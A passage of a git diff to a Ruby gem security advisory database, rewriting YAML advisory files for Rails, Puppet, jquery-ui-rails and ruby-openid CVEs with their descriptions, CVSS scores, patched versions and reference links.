+    before 3.1.6, and 3.2.x before 3.2.6 does not properly implement
+    the passing of request data to a where method in an ActiveRecord
+    class, which allows remote attackers to conduct certain SQL
+    injection attacks via nested query parameters that leverage
+    improper handling of nested hashes, a related issue to CVE-2012-2661.
+  cvss_v2: 7.5
+  patched_versions:
+  - "~> 3.0.14"
+  - "~> 3.1.6"
+  - ">= 3.2.6"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-2695
+    - https://groups.google.com/g/rubyonrails-security/c/l4L0TEVAz1k/m/Vr84sD9B464J
+    - https://github.com/advisories/GHSA-76wq-xw4h-f8wj
+    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00002.html
+    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00014.html
+    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00016.html
+    - http://lists.opensuse.org/opensuse-updates/2012-08/msg00046.html
+    - http://rhn.redhat.com/errata/RHSA-2013-0154.html
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2012-3408.md b/advisories/_posts/2017-10-24-CVE-2012-3408.md
index b16e0efa..be4e6725 100644
--- a/advisories/_posts/2017-10-24-CVE-2012-3408.md
+++ b/advisories/_posts/2017-10-24-CVE-2012-3408.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2012-3408 (puppet): Agent Imprersonation in Puppet'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2012-3408
-  ghsa: vxf6-w9mp-95hm
-  url: https://www.puppet.com/security/cve/cve-2012-3408-agent-impersonation
-  title: Agent Imprersonation in Puppet
-  date: 2017-10-24
-  description: |
-    lib/puppet/network/authstore.rb in Puppet before 2.7.18, and
-    Puppet Enterprise before 2.5.2, supports use of IP addresses in
-    certnames without warning of potential risks, which might allow
-    remote attackers to spoof an agent by acquiring a previously
-    used IP address.
-  cvss_v2: 2.6
-  patched_versions:
-  - ">= 2.7.18"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-3408
-    - https://www.puppet.com/security/cve/cve-2012-3408-agent-impersonation
-    - https://github.com/puppetlabs/puppet/commit/ab9150baa1b738467a33b01df1d90e076253fbbd
-    - https://github.com/advisories/GHSA-vxf6-w9mp-95hm
-    - https://bugzilla.redhat.com/show_bug.cgi?id=839166
----
+---
+layout: advisory
+title: 'CVE-2012-3408 (puppet): Agent Imprersonation in Puppet'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2012-3408
+  ghsa: vxf6-w9mp-95hm
+  url: https://www.puppet.com/security/cve/cve-2012-3408-agent-impersonation
+  title: Agent Imprersonation in Puppet
+  date: 2017-10-24
+  description: |
+    lib/puppet/network/authstore.rb in Puppet before 2.7.18, and
+    Puppet Enterprise before 2.5.2, supports use of IP addresses in
+    certnames without warning of potential risks, which might allow
+    remote attackers to spoof an agent by acquiring a previously
+    used IP address.
+  cvss_v2: 2.6
+  patched_versions:
+  - ">= 2.7.18"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-3408
+    - https://www.puppet.com/security/cve/cve-2012-3408-agent-impersonation
+    - https://github.com/puppetlabs/puppet/commit/ab9150baa1b738467a33b01df1d90e076253fbbd
+    - https://github.com/advisories/GHSA-vxf6-w9mp-95hm
+    - https://bugzilla.redhat.com/show_bug.cgi?id=839166
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2012-3865.md b/advisories/_posts/2017-10-24-CVE-2012-3865.md
index 3e3bb8e9..99ade029 100644
--- a/advisories/_posts/2017-10-24-CVE-2012-3865.md
+++ b/advisories/_posts/2017-10-24-CVE-2012-3865.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2012-3865 (puppet): Arbitrary file delete/D.O.S on Puppet Master'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2012-3865
-  ghsa: g89m-3wjw-h857
-  url: https://www.puppet.com/security/cve/overview-cve-2012-3865-arbitrary-file-delete/dos-puppet-master
-  title: Arbitrary file delete/D.O.S on Puppet Master
-  date: 2017-10-24
-  description: |
-    Directory traversal vulnerability in lib/puppet/reports/store.rb
-    in Puppet before 2.6.17 and 2.7.x before 2.7.18, and Puppet
-    Enterprise before 2.5.2, when Delete is enabled in auth.conf,
-    allows remote authenticated users to delete arbitrary files on
-    the puppet master server via a .. (dot dot) in a node name.
-  cvss_v2: 3.5
-  patched_versions:
-  - "~> 2.6.17"
-  - ">= 2.7.18"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-3865
-    - https://www.puppet.com/security/cve/overview-cve-2012-3865-arbitrary-file-delete/dos-puppet-master
-    - https://github.com/puppetlabs/puppet/commit/554eefc55f57ed2b76e5ee04d8f194d36f6ee67f
-    - https://github.com/puppetlabs/puppet/commit/d80478208d79a3e6d6cb1fbc525e24817fe8c4c6
-    - https://github.com/advisories/GHSA-g89m-3wjw-h857
-    - https://bugzilla.redhat.com/show_bug.cgi?id=839131
-    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00006.html
-    - http://www.debian.org/security/2012/dsa-2511
-    - http://www.ubuntu.com/usn/USN-1506-1
----
+---
+layout: advisory
+title: 'CVE-2012-3865 (puppet): Arbitrary file delete/D.O.S on Puppet Master'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2012-3865
+  ghsa: g89m-3wjw-h857
+  url: https://www.puppet.com/security/cve/overview-cve-2012-3865-arbitrary-file-delete/dos-puppet-master
+  title: Arbitrary file delete/D.O.S on Puppet Master
+  date: 2017-10-24
+  description: |
+    Directory traversal vulnerability in lib/puppet/reports/store.rb
+    in Puppet before 2.6.17 and 2.7.x before 2.7.18, and Puppet
+    Enterprise before 2.5.2, when Delete is enabled in auth.conf,
+    allows remote authenticated users to delete arbitrary files on
+    the puppet master server via a .. (dot dot) in a node name.
+  cvss_v2: 3.5
+  patched_versions:
+  - "~> 2.6.17"
+  - ">= 2.7.18"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-3865
+    - https://www.puppet.com/security/cve/overview-cve-2012-3865-arbitrary-file-delete/dos-puppet-master
+    - https://github.com/puppetlabs/puppet/commit/554eefc55f57ed2b76e5ee04d8f194d36f6ee67f
+    - https://github.com/puppetlabs/puppet/commit/d80478208d79a3e6d6cb1fbc525e24817fe8c4c6
+    - https://github.com/advisories/GHSA-g89m-3wjw-h857
+    - https://bugzilla.redhat.com/show_bug.cgi?id=839131
+    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00006.html
+    - http://www.debian.org/security/2012/dsa-2511
+    - http://www.ubuntu.com/usn/USN-1506-1
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2012-3866.md b/advisories/_posts/2017-10-24-CVE-2012-3866.md
index edd2ac58..05d0713e 100644
--- a/advisories/_posts/2017-10-24-CVE-2012-3866.md
+++ b/advisories/_posts/2017-10-24-CVE-2012-3866.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2012-3866 (puppet): last_run_report.yaml is world readable'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2012-3866
-  ghsa: 8jxj-9r5f-w3m2
-  url: https://www.puppet.com/security/cve/cve-2012-3866-lastrunreportyaml-world-readable
-  title: last_run_report.yaml is world readable
-  date: 2017-10-24
-  description: |
-    lib/puppet/defaults.rb in Puppet 2.7.x before 2.7.18, and Puppet
-    Enterprise before 2.5.2, uses 0644 permissions for last_run_report.yaml,
-    which allows local users to obtain sensitive configuration information
-    by leveraging access to the puppet master server to read this file.
-  unaffected_versions:
-  - "< 2.7.0"
-  patched_versions:
-  - ">= 2.7.18"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-3866
-    - https://www.puppet.com/security/cve/cve-2012-3866-lastrunreportyaml-world-readable
-    - https://github.com/puppetlabs/puppet/commit/fd44bf5e6d0d360f6a493d663b653c121fa83c3f
-    - https://github.com/advisories/GHSA-8jxj-9r5f-w3m2
-    - https://bugzilla.redhat.com/show_bug.cgi?id=839135
-    - http://lists.opensuse.org/opensuse-updates/2012-07/msg00036.html
-    - http://www.debian.org/security/2012/dsa-2511
-    - http://www.ubuntu.com/usn/USN-1506-1
----
+---
+layout: advisory
+title: 'CVE-2012-3866 (puppet): last_run_report.yaml is world readable'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2012-3866
+  ghsa: 8jxj-9r5f-w3m2
+  url: https://www.puppet.com/security/cve/cve-2012-3866-lastrunreportyaml-world-readable
+  title: last_run_report.yaml is world readable
+  date: 2017-10-24
+  description: |
+    lib/puppet/defaults.rb in Puppet 2.7.x before 2.7.18, and Puppet
+    Enterprise before 2.5.2, uses 0644 permissions for last_run_report.yaml,
+    which allows local users to obtain sensitive configuration information
+    by leveraging access to the puppet master server to read this file.
+  unaffected_versions:
+  - "< 2.7.0"
+  patched_versions:
+  - ">= 2.7.18"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-3866
+    - https://www.puppet.com/security/cve/cve-2012-3866-lastrunreportyaml-world-readable
+    - https://github.com/puppetlabs/puppet/commit/fd44bf5e6d0d360f6a493d663b653c121fa83c3f
+    - https://github.com/advisories/GHSA-8jxj-9r5f-w3m2
+    - https://bugzilla.redhat.com/show_bug.cgi?id=839135
+    - http://lists.opensuse.org/opensuse-updates/2012-07/msg00036.html
+    - http://www.debian.org/security/2012/dsa-2511
+    - http://www.ubuntu.com/usn/USN-1506-1
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2012-3867.md b/advisories/_posts/2017-10-24-CVE-2012-3867.md
index 6fecc12f..666b45ce 100644
--- a/advisories/_posts/2017-10-24-CVE-2012-3867.md
+++ b/advisories/_posts/2017-10-24-CVE-2012-3867.md
@@ -1,37 +1,37 @@
----
-layout: advisory
-title: 'CVE-2012-3867 (puppet): Insufficient input validation'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2012-3867
-  ghsa: q44r-f2hm-v76v
-  url: https://www.puppet.com/security/cve/cve-2012-3867-insufficient-input-validation
-  title: Insufficient input validation
-  date: 2017-10-24
-  description: |
-    lib/puppet/ssl/certificate_authority.rb in Puppet before 2.6.17 and
-    2.7.x before 2.7.18, and Puppet Enterprise before 2.5.2, does not
-    properly restrict the characters in the Common Name field of a
-    Certificate Signing Request (CSR), which makes it easier for
-    user-assisted remote attackers to trick administrators into
-    signing a crafted agent certificate via ANSI control sequences.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 2.6.17"
-  - ">= 2.7.18"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-3867
-    - https://www.puppet.com/security/cve/cve-2012-3867-insufficient-input-validation
-    - https://github.com/puppetlabs/puppet/commit/dfedaa5fa841ccf335245a748b347b7c7c236640
-    - https://github.com/puppetlabs/puppet/commit/f3419620b42080dad3b0be14470b20a972f13c50
-    - https://github.com/advisories/GHSA-q44r-f2hm-v76v
-    - https://bugzilla.redhat.com/show_bug.cgi?id=839158
-    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00006.html
-    - http://lists.opensuse.org/opensuse-updates/2012-07/msg00036.html
-    - http://www.debian.org/security/2012/dsa-2511
-    - http://www.ubuntu.com/usn/USN-1506-1
----
+---
+layout: advisory
+title: 'CVE-2012-3867 (puppet): Insufficient input validation'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2012-3867
+  ghsa: q44r-f2hm-v76v
+  url: https://www.puppet.com/security/cve/cve-2012-3867-insufficient-input-validation
+  title: Insufficient input validation
+  date: 2017-10-24
+  description: |
+    lib/puppet/ssl/certificate_authority.rb in Puppet before 2.6.17 and
+    2.7.x before 2.7.18, and Puppet Enterprise before 2.5.2, does not
+    properly restrict the characters in the Common Name field of a
+    Certificate Signing Request (CSR), which makes it easier for
+    user-assisted remote attackers to trick administrators into
+    signing a crafted agent certificate via ANSI control sequences.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 2.6.17"
+  - ">= 2.7.18"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-3867
+    - https://www.puppet.com/security/cve/cve-2012-3867-insufficient-input-validation
+    - https://github.com/puppetlabs/puppet/commit/dfedaa5fa841ccf335245a748b347b7c7c236640
+    - https://github.com/puppetlabs/puppet/commit/f3419620b42080dad3b0be14470b20a972f13c50
+    - https://github.com/advisories/GHSA-q44r-f2hm-v76v
+    - https://bugzilla.redhat.com/show_bug.cgi?id=839158
+    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00006.html
+    - http://lists.opensuse.org/opensuse-updates/2012-07/msg00036.html
+    - http://www.debian.org/security/2012/dsa-2511
+    - http://www.ubuntu.com/usn/USN-1506-1
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2012-6662.md b/advisories/_posts/2017-10-24-CVE-2012-6662.md
index a0d94223..a1e5e65b 100644
--- a/advisories/_posts/2017-10-24-CVE-2012-6662.md
+++ b/advisories/_posts/2017-10-24-CVE-2012-6662.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2012-6662 (jquery-ui-rails): Moderate severity vulnerability that affects
-  jquery-ui'
-comments: false
-categories:
-- jquery-ui-rails
-advisory:
-  gem: jquery-ui-rails
-  cve: 2012-6662
-  ghsa: qqxp-xp9v-vvx6
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-6662
-  title: Moderate severity vulnerability that affects jquery-ui
-  date: 2017-10-24
-  description: |
-    Cross-site scripting (XSS) vulnerability in the default content option
-    in jquery.ui.tooltip.js in the Tooltip widget in jQuery UI before
-    1.10.0 allows remote attackers to inject arbitrary web script or
-    HTML via the title attribute, which is not properly handled in the
-    autocomplete combo box demo.
-  cvss_v2: 4.3
-  patched_versions:
-  - ">= 4.0.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-6662
-    - https://github.com/jquery-ui-rails/jquery-ui-rails/commit/61a8e3f50796118e9f49fbd224b67d4065b40c50
-    - https://github.com/jquery/jquery-ui/commit/f2854408cce7e4b7fc6bf8676761904af9c96bde
-    - https://github.com/jquery/jquery-ui/commit/5fee6fd5000072ff32f2d65b6451f39af9e0e39e
-    - http://bugs.jqueryui.com/ticket/8859
-    - http://bugs.jqueryui.com/ticket/8861
-    - https://github.com/jquery/jquery/issues/2432
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/98697
-    - http://rhn.redhat.com/errata/RHSA-2015-0442.html
-    - http://rhn.redhat.com/errata/RHSA-2015-1462.html
-    - http://seclists.org/oss-sec/2014/q4/613
-    - http://seclists.org/oss-sec/2014/q4/616
-    - http://www.securityfocus.com/bid/71107
-    - https://github.com/advisories/GHSA-qqxp-xp9v-vvx6
----
+---
+layout: advisory
+title: 'CVE-2012-6662 (jquery-ui-rails): Moderate severity vulnerability that affects
+  jquery-ui'
+comments: false
+categories:
+- jquery-ui-rails
+advisory:
+  gem: jquery-ui-rails
+  cve: 2012-6662
+  ghsa: qqxp-xp9v-vvx6
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-6662
+  title: Moderate severity vulnerability that affects jquery-ui
+  date: 2017-10-24
+  description: |
+    Cross-site scripting (XSS) vulnerability in the default content option
+    in jquery.ui.tooltip.js in the Tooltip widget in jQuery UI before
+    1.10.0 allows remote attackers to inject arbitrary web script or
+    HTML via the title attribute, which is not properly handled in the
+    autocomplete combo box demo.
+  cvss_v2: 4.3
+  patched_versions:
+  - ">= 4.0.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-6662
+    - https://github.com/jquery-ui-rails/jquery-ui-rails/commit/61a8e3f50796118e9f49fbd224b67d4065b40c50
+    - https://github.com/jquery/jquery-ui/commit/f2854408cce7e4b7fc6bf8676761904af9c96bde
+    - https://github.com/jquery/jquery-ui/commit/5fee6fd5000072ff32f2d65b6451f39af9e0e39e
+    - http://bugs.jqueryui.com/ticket/8859
+    - http://bugs.jqueryui.com/ticket/8861
+    - https://github.com/jquery/jquery/issues/2432
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/98697
+    - http://rhn.redhat.com/errata/RHSA-2015-0442.html
+    - http://rhn.redhat.com/errata/RHSA-2015-1462.html
+    - http://seclists.org/oss-sec/2014/q4/613
+    - http://seclists.org/oss-sec/2014/q4/616
+    - http://www.securityfocus.com/bid/71107
+    - https://github.com/advisories/GHSA-qqxp-xp9v-vvx6
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2013-1655.md b/advisories/_posts/2017-10-24-CVE-2013-1655.md
index dc4acf7c..4b687407 100644
--- a/advisories/_posts/2017-10-24-CVE-2013-1655.md
+++ b/advisories/_posts/2017-10-24-CVE-2013-1655.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2013-1655 (puppet): Unauthenticated Remote Code Execution Vulnerability'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2013-1655
-  ghsa: 574q-fxfj-wv6h
-  url: https://www.puppet.com/security/cve/cve-2013-1655-unauthenticated-remote-code-execution-vulnerability
-  title: Unauthenticated Remote Code Execution Vulnerability
-  date: 2017-10-24
-  description: |
-    Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, when running
-    Ruby 1.9.3 or later, allows remote attackers to execute arbitrary
-    code via vectors related to "serialized attributes."
-  cvss_v2: 7.5
-  unaffected_versions:
-  - "< 2.7.0"
-  patched_versions:
-  - "~> 2.7.21"
-  - ">= 3.1.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2013-1655
-    - https://www.puppet.com/security/cve/cve-2013-1655-unauthenticated-remote-code-execution-vulnerability
-    - https://github.com/advisories/GHSA-574q-fxfj-wv6h
-    - http://lists.opensuse.org/opensuse-security-announce/2013-04/msg00004.html
-    - http://lists.opensuse.org/opensuse-updates/2013-04/msg00056.html
-    - http://ubuntu.com/usn/usn-1759-1
-    - http://www.debian.org/security/2013/dsa-2643
-    - https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2013-1655
-    - https://web.archive.org/web/20210509162357/https://www.securityfocus.com/bid/46291
----
+---
+layout: advisory
+title: 'CVE-2013-1655 (puppet): Unauthenticated Remote Code Execution Vulnerability'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2013-1655
+  ghsa: 574q-fxfj-wv6h
+  url: https://www.puppet.com/security/cve/cve-2013-1655-unauthenticated-remote-code-execution-vulnerability
+  title: Unauthenticated Remote Code Execution Vulnerability
+  date: 2017-10-24
+  description: |
+    Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, when running
+    Ruby 1.9.3 or later, allows remote attackers to execute arbitrary
+    code via vectors related to "serialized attributes."
+  cvss_v2: 7.5
+  unaffected_versions:
+  - "< 2.7.0"
+  patched_versions:
+  - "~> 2.7.21"
+  - ">= 3.1.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2013-1655
+    - https://www.puppet.com/security/cve/cve-2013-1655-unauthenticated-remote-code-execution-vulnerability
+    - https://github.com/advisories/GHSA-574q-fxfj-wv6h
+    - http://lists.opensuse.org/opensuse-security-announce/2013-04/msg00004.html
+    - http://lists.opensuse.org/opensuse-updates/2013-04/msg00056.html
+    - http://ubuntu.com/usn/usn-1759-1
+    - http://www.debian.org/security/2013/dsa-2643
+    - https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2013-1655
+    - https://web.archive.org/web/20210509162357/https://www.securityfocus.com/bid/46291
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2013-1812.md b/advisories/_posts/2017-10-24-CVE-2013-1812.md
index d51fd7ec..3b5077ee 100644
--- a/advisories/_posts/2017-10-24-CVE-2013-1812.md
+++ b/advisories/_posts/2017-10-24-CVE-2013-1812.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2013-1812 (ruby-openid): Vulnerable to XIE DoS attacks'
-comments: false
-categories:
-- ruby-openid
-advisory:
-  gem: ruby-openid
-  cve: 2013-1812
-  ghsa: 6c8p-qphv-668v
-  url: https://github.com/openid/ruby-openid/blob/master/CHANGELOG.md
-  title: Vulnerable to XIE DoS attacks
-  date: 2017-10-24
-  description: |
-    The ruby-openid gem before 2.2.2 for Ruby allows remote OpenID
-    providers to cause a denial of service (CPU consumption) via
-    (1) a large XRDS document or
-    (2) an XML Entity Expansion (XEE) attack.
-  cvss_v2: 4.3
-  patched_versions:
-  - ">= 2.2.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2013-1812
-    - https://github.com/openid/ruby-openid/blob/master/CHANGELOG.md
-    - https://github.com/openid/ruby-openid/pull/43
-    - https://github.com/openid/ruby-openid/commit/a3693cef06049563f5b4e4824f4d3211288508ed
-    - https://github.com/advisories/GHSA-6c8p-qphv-668v
-    - https://bugzilla.redhat.com/show_bug.cgi?id=918134
-    - http://lists.fedoraproject.org/pipermail/package-announce/2013-November/120204.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2013-November/120361.html
-    - http://www.openwall.com/lists/oss-security/2013/03/03/8
----
+---
+layout: advisory
+title: 'CVE-2013-1812 (ruby-openid): Vulnerable to XIE DoS attacks'
+comments: false
+categories:
+- ruby-openid
+advisory:
+  gem: ruby-openid
+  cve: 2013-1812
+  ghsa: 6c8p-qphv-668v
+  url: https://github.com/openid/ruby-openid/blob/master/CHANGELOG.md
+  title: Vulnerable to XIE DoS attacks
+  date: 2017-10-24
+  description: |
+    The ruby-openid gem before 2.2.2 for Ruby allows remote OpenID
+    providers to cause a denial of service (CPU consumption) via
+    (1) a large XRDS document or
+    (2) an XML Entity Expansion (XEE) attack.
+  cvss_v2: 4.3
+  patched_versions:
+  - ">= 2.2.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2013-1812
+    - https://github.com/openid/ruby-openid/blob/master/CHANGELOG.md
+    - https://github.com/openid/ruby-openid/pull/43
+    - https://github.com/openid/ruby-openid/commit/a3693cef06049563f5b4e4824f4d3211288508ed
+    - https://github.com/advisories/GHSA-6c8p-qphv-668v
+    - https://bugzilla.redhat.com/show_bug.cgi?id=918134
+    - http://lists.fedoraproject.org/pipermail/package-announce/2013-November/120204.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2013-November/120361.html
+    - http://www.openwall.com/lists/oss-security/2013/03/03/8
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2013-3567.md b/advisories/_posts/2017-10-24-CVE-2013-3567.md
index 49cc4db1..57933519 100644
--- a/advisories/_posts/2017-10-24-CVE-2013-3567.md
+++ b/advisories/_posts/2017-10-24-CVE-2013-3567.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2013-3567 (puppet): Unauthenticated Remote Code Execution Vulnerability'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2013-3567
-  ghsa: f7p5-w2cr-7cp7
-  url: https://www.puppet.com/security/cve/cve-2013-3567-unauthenticated-remote-code-execution-vulnerability
-  title: Unauthenticated Remote Code Execution Vulnerability
-  date: 2017-10-24
-  description: |
-    Puppet 2.7.x before 2.7.22 and 3.2.x before 3.2.2, and Puppet
-    Enterprise before 2.8.2, deserializes untrusted YAML, which allows
-    remote attackers to instantiate arbitrary Ruby classes and execute
-    arbitrary code via a crafted REST API call.
-  cvss_v2: 7.5
-  patched_versions:
-  - "~> 2.7.22"
-  - ">= 3.2.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2013-3567
-    - https://www.puppet.com/security/cve/cve-2013-3567-unauthenticated-remote-code-execution-vulnerability
-    - https://github.com/advisories/GHSA-f7p5-w2cr-7cp7
-    - http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00002.html
-    - http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00019.html
-    - http://rhn.redhat.com/errata/RHSA-2013-1283.html
-    - http://rhn.redhat.com/errata/RHSA-2013-1284.html
-    - http://www.debian.org/security/2013/dsa-2715
-    - http://www.ubuntu.com/usn/USN-1886-1
----
+---
+layout: advisory
+title: 'CVE-2013-3567 (puppet): Unauthenticated Remote Code Execution Vulnerability'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2013-3567
+  ghsa: f7p5-w2cr-7cp7
+  url: https://www.puppet.com/security/cve/cve-2013-3567-unauthenticated-remote-code-execution-vulnerability
+  title: Unauthenticated Remote Code Execution Vulnerability
+  date: 2017-10-24
+  description: |
+    Puppet 2.7.x before 2.7.22 and 3.2.x before 3.2.2, and Puppet
+    Enterprise before 2.8.2, deserializes untrusted YAML, which allows
+    remote attackers to instantiate arbitrary Ruby classes and execute
+    arbitrary code via a crafted REST API call.
+  cvss_v2: 7.5
+  patched_versions:
+  - "~> 2.7.22"
+  - ">= 3.2.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2013-3567
+    - https://www.puppet.com/security/cve/cve-2013-3567-unauthenticated-remote-code-execution-vulnerability
+    - https://github.com/advisories/GHSA-f7p5-w2cr-7cp7
+    - http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00002.html
+    - http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00019.html
+    - http://rhn.redhat.com/errata/RHSA-2013-1283.html
+    - http://rhn.redhat.com/errata/RHSA-2013-1284.html
+    - http://www.debian.org/security/2013/dsa-2715
+    - http://www.ubuntu.com/usn/USN-1886-1
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2013-4761.md b/advisories/_posts/2017-10-24-CVE-2013-4761.md
index 5f2677cc..d894f248 100644
--- a/advisories/_posts/2017-10-24-CVE-2013-4761.md
+++ b/advisories/_posts/2017-10-24-CVE-2013-4761.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2013-4761 (puppet): Puppet `resource_type` Remote Code Execution Vulnerability'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2013-4761
-  ghsa: cj43-9h3w-v976
-  url: https://www.puppet.com/security/cve/cve-2013-4761-resourcetype-remote-code-execution-vulnerability
-  title: Puppet `resource_type` Remote Code Execution Vulnerability
-  date: 2017-10-24
-  description: |
-    Unspecified vulnerability in Puppet 2.7.x before 2.7.23 and
-    3.2.x before 3.2.4, and Puppet Enterprise 2.8.x before
-    2.8.3 and 3.0.x before 3.0.1, allows remote attackers to execute
-    arbitrary Ruby programs from the master via the resource_type
-    service.
-
-    NOTE: this vulnerability can only be exploited using unspecified
-    "local file system access" to the Puppet Master.
-  cvss_v2: 5.1
-  unaffected_versions:
-  - "< 2.7.0"
-  patched_versions:
-  - "~> 2.7.23"
-  - ">= 3.2.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2013-4761
-    - https://www.puppet.com/security/cve/cve-2013-4761-resourcetype-remote-code-execution-vulnerability
-    - https://github.com/advisories/GHSA-cj43-9h3w-v976
-    - http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00009.html
-    - http://rhn.redhat.com/errata/RHSA-2013-1283.html
-    - http://rhn.redhat.com/errata/RHSA-2013-1284.html
-    - http://www.debian.org/security/2013/dsa-2761
----
+---
+layout: advisory
+title: 'CVE-2013-4761 (puppet): Puppet `resource_type` Remote Code Execution Vulnerability'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2013-4761
+  ghsa: cj43-9h3w-v976
+  url: https://www.puppet.com/security/cve/cve-2013-4761-resourcetype-remote-code-execution-vulnerability
+  title: Puppet `resource_type` Remote Code Execution Vulnerability
+  date: 2017-10-24
+  description: |
+    Unspecified vulnerability in Puppet 2.7.x before 2.7.23 and
+    3.2.x before 3.2.4, and Puppet Enterprise 2.8.x before
+    2.8.3 and 3.0.x before 3.0.1, allows remote attackers to execute
+    arbitrary Ruby programs from the master via the resource_type
+    service.
+
+    NOTE: this vulnerability can only be exploited using unspecified
+    "local file system access" to the Puppet Master.
+  cvss_v2: 5.1
+  unaffected_versions:
+  - "< 2.7.0"
+  patched_versions:
+  - "~> 2.7.23"
+  - ">= 3.2.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2013-4761
+    - https://www.puppet.com/security/cve/cve-2013-4761-resourcetype-remote-code-execution-vulnerability
+    - https://github.com/advisories/GHSA-cj43-9h3w-v976
+    - http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00009.html
+    - http://rhn.redhat.com/errata/RHSA-2013-1283.html
+    - http://rhn.redhat.com/errata/RHSA-2013-1284.html
+    - http://www.debian.org/security/2013/dsa-2761
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2014-0081.md b/advisories/_posts/2017-10-24-CVE-2014-0081.md
index cbdc5159..55bc4b2b 100644
--- a/advisories/_posts/2017-10-24-CVE-2014-0081.md
+++ b/advisories/_posts/2017-10-24-CVE-2014-0081.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2014-0081 (rails): Rails vulnerable to Cross-site Scripting'
-comments: false
-categories:
-- rails
-advisory:
-  gem: rails
-  cve: 2014-0081
-  ghsa: m46p-ggm5-5j83
-  url: https://github.com/rails/rails/commit/08d0a11a3f62718d601d39e617c834759cf59bbb
-  title: Rails vulnerable to Cross-site Scripting
-  date: 2017-10-24
-  description: |
-    Multiple cross-site scripting (XSS) vulnerabilities in
-    "actionview/lib/action_view/helpers/number_helper.rb"
-    in Ruby on Rails before 3.2.17, 4.0.x before 4.0.3, and 4.1.x before 4.1.0.beta2
-    allow remote attackers to inject arbitrary web script or HTML via the
-    (1) format, (2) negative_format, or (3) units parameter to the
-    (a) number_to_currency, (b) number_to_percentage, or (c) number_to_human helper.
-  cvss_v2: 4.3
-  patched_versions:
